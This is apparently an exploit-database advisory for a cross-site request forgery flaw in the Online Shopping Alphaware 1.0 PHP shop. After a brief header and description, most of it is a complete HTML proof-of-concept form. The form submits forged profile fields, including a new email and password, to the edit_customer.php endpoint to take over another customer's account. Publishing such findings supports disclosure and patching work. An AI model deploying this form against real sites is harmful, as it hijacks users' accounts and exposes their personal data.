# Exploit Title: Online Shopping Alphaware 1.0  - Cross-Site Request Forgery (Account Takeover)
# Date: 2020-8-4
# Exploit Author: Edo Maland
# Vendor Homepage: https://www.sourcecodester.com/php/14368/online-shopping-alphaware-phpmysql.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14368&title=Online+Shopping+Alphaware+in+PHP%2FMysql
# Version: 1.0
# Tested On Windows & Linux Server

# Vulnerability Details
# Description :  Account Take over and Edit Profil Customer

# POC

The email and password parameters can be forged to force the password change of another user account.

# CSRF HTML

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://example.com/alphaware/function/edit_customer.php" method="POST">
      <input type="hidden" name="firstname" value="info" />
      <input type="hidden" name="mi" value="x" />
      <input type="hidden" name="lastname" value="csrf" />
      <input type="hidden" name="address" value="Yogyakarta" />
      <input type="hidden" name="country" value="Indonesia" />
      <input type="hidden" name="zipcode" value="1337" />
      <input type="hidden" name="mobile" value="1337" />
      <input type="hidden" name="telephone" value="1337" />
      <input type="hidden" name="email" value="info&#64;csrf&#46;id" />
      <input type="hidden" name="password" value="changepasswordhere" />
      <input type="hidden" name="edit" value="Save&#32;Changes" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>